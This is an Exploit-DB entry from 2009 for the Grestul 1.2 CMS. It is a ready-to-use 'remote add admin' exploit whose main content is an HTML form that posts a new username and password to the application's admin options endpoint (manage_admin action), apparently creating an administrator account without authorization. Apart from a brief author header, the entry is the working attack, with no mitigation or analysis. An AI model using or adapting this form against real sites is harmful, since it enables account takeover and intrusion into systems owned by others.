Grestul 1.2 - Remote Add Administrator Account

EDB-ID:

8902


Platform:

PHP

Published:

2009-06-08

Grestul 1.2 Remote add admin exploit
Founder: ThE g0bL!N
------
Home: http:/www.4ckx.com/dz/
----
Vendor:http://grestul.com/
Note: Algerie 3-1 Egypt

code
-----
<form method="post" name="add_admin" id="add_admin" action="http://grestul.com/demo/admin/options.php?action=manage_admin">
  <label for="username_new" class="label_newpage">Username:</label><br /><input type="text" name="username_new" id="username_new" class="input_newpage" value="" />
  <br /><br /><label for="password" class="label_newpage">New Password:</label><br /><input type="password" name="password" id="password" class="input_newpage" value="" />
  <br /><br /><label for="con_password" class="label_newpage">Confirm Password:</label><br /><input type="password" name="con_password" id="con_password" class="input_newpage" value="" />
  <br /><input type="submit" name="add_admin" id="add_admin" value="Add Admin" class="submit_newpage" />
  </form></div>
---------------------------------------------------------------------------------------------------------

# milw0rm.com [2009-06-08]